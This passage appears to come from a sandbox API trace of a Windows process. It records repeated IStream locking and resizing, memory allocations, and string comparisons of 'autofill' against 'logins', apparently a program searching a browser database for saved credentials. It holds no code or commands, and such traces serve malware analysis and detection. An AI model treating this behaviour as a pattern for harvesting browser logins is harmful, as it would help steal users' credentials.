dwLockType=0x2) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0590.101] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d970 [0590.101] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x1c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.101] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56b778 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x1d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.101] IStream:SetSize (This=0x5ec250, libNewSize=0x56b778) returned 0x0 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x146) returned 0x5d5128 [0590.101] LocalFree (hMem=0x56b778) returned 0x0 [0590.101] LocalFree (hMem=0x570078) returned 0x0 [0590.101] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.101] lstrcmpiA (lpString1="autofill", lpString2="logins") returned -1 [0590.101] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.101] LocalFree (hMem=0x58d548) returned 0x0 [0590.101] LocalFree (hMem=0x58d970) returned 0x0 [0590.101] LocalFree (hMem=0x58d840) returned 0x0 [0590.101] LocalFree (hMem=0x5d5128) returned 0x0 [0590.101] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.101] IStream:LockRegion (This=0x57ea78, libOffset=0x6459, cb=0x0, dwLockType=0x0) returned 0x0 [0590.101] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.101] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.101] IStream:LockRegion (This=0x57ea78, libOffset=0x6459, cb=0x0, dwLockType=0x0) returned 0x0 [0590.101] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.101] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.101] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.101] IStream:LockRegion (This=0x57ea78, libOffset=0x645a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.101] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.101] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.102] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x57ea78, libOffset=0x645b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.102] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.102] LocalFree (hMem=0x2f09968) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.102] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.102] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.102] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.102] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0590.102] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.102] LocalAlloc (uFlags=0x40, uBytes=0x9b) returned 0x5d1978 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x5ec250, libNewSize=0x5d1978) returned 0x0 [0590.102] LocalAlloc (uFlags=0x40, uBytes=0xa3) returned 0x59a9c8 [0590.102] LocalFree (hMem=0x5d1978) returned 0x0 [0590.102] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x26, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.102] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d970 [0590.102] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.102] IStream:LockRegion (This=0x5ec250, libOffset=0x2e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.102] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.102] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.102] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.102] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.102] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.102] lstrcmpiA (lpString1="autofill", lpString2="logins") returned -1 [0590.103] LocalFree (hMem=0x58d840) returned 0x0 [0590.103] LocalFree (hMem=0x59a9c8) returned 0x0 [0590.103] LocalFree (hMem=0x58d970) returned 0x0 [0590.103] LocalFree (hMem=0x58d548) returned 0x0 [0590.103] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.103] LocalFree (hMem=0x570078) returned 0x0 [0590.103] IStream:LockRegion (This=0x57ea78, libOffset=0x632b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x57ea78, libOffset=0x632b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.103] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x57ea78, libOffset=0x632c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.103] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.103] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.103] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x57ea78, libOffset=0x632d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.103] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.103] LocalFree (hMem=0x2f09968) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.103] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.103] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.103] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.103] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.103] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.103] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.103] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.103] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:SetSize (This=0x5ec250, libNewSize=0x58d970) returned 0x0 [0590.104] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x56ff38 [0590.104] LocalFree (hMem=0x58d970) returned 0x0 [0590.104] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.104] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d970 [0590.104] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x20, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.104] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0590.104] LocalAlloc (uFlags=0x40, uBytes=0xad) returned 0x2ed5118 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x21, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:SetSize (This=0x5ec250, libNewSize=0x2ed5118) returned 0x0 [0590.104] LocalAlloc (uFlags=0x40, uBytes=0xb5) returned 0x2ed72a0 [0590.104] LocalFree (hMem=0x2ed5118) returned 0x0 [0590.104] LocalFree (hMem=0x570078) returned 0x0 [0590.104] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.104] lstrcmpiA (lpString1="autofill", lpString2="logins") returned -1 [0590.104] LocalFree (hMem=0x58d548) returned 0x0 [0590.104] LocalFree (hMem=0x56ff38) returned 0x0 [0590.104] LocalFree (hMem=0x58d970) returned 0x0 [0590.104] LocalFree (hMem=0x58d840) returned 0x0 [0590.104] LocalFree (hMem=0x2ed72a0) returned 0x0 [0590.104] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.104] IStream:LockRegion (This=0x57ea78, libOffset=0x62b5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.104] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.104] IStream:LockRegion (This=0x57ea78, libOffset=0x62b5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.104] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.104] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.104] IStream:LockRegion (This=0x57ea78, libOffset=0x62b6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.104] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.104] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.104] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.104] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.104] IStream:LockRegion (This=0x57ea78, libOffset=0x62b7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.104] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.104] LocalFree (hMem=0x2f09968) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.104] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ffd8 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.104] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.104] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.105] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0590.105] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.105] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0590.105] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.105] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1978 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:SetSize (This=0x5ec250, libNewSize=0x5d1978) returned 0x0 [0590.105] LocalAlloc (uFlags=0x40, uBytes=0xa1) returned 0x59a9c8 [0590.105] LocalFree (hMem=0x5d1978) returned 0x0 [0590.105] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x25, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.105] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d970 [0590.105] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x2d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.105] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.105] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0x5d73b0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.105] IStream:LockRegion (This=0x5ec250, libOffset=0x2e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:SetSize (This=0x5ec250, libNewSize=0x5d73b0) returned 0x0 [0590.105] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5977a0 [0590.105] LocalFree (hMem=0x5d73b0) returned 0x0 [0590.105] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.105] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.105] lstrcmpiA (lpString1="autofill", lpString2="logins") returned -1 [0590.105] LocalFree (hMem=0x58d840) returned 0x0 [0590.105] LocalFree (hMem=0x59a9c8) returned 0x0 [0590.105] LocalFree (hMem=0x58d970) returned 0x0 [0590.105] LocalFree (hMem=0x58d548) returned 0x0 [0590.105] LocalFree (hMem=0x5977a0) returned 0x0 [0590.105] LocalFree (hMem=0x56ff38) returned 0x0 [0590.105] IStream:LockRegion (This=0x57ea78, libOffset=0x6147, cb=0x0, dwLockType=0x0) returned 0x0 [0590.105] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.105] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x57ea78, libOffset=0x6147, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.106] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x57ea78, libOffset=0x6148, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.106] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x57ea78, libOffset=0x6149, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.106] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.106] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.106] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x57ea78, libOffset=0x614a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.106] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 